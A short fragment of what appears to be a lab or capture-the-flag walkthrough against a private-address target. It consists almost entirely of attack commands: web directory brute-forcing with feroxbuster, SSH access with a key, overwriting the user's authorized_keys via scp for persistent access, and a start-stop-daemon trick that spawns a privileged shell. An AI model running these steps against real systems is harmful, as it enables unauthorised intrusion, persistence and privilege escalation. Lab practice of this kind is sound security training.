7742

feroxbuster -u http://192.168.190.100:7742/ -C 404,400 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt' -B --auto-tune

Now we can try running this script with ssh:

ssh max@192.168.190.100 -i id_rsa /home/max/scp_wrapper.sh
scp -O -i id_rsa authorized_keys max@192.168.190.100:/home/max/.ssh/authorized_keys
/usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p

Last updated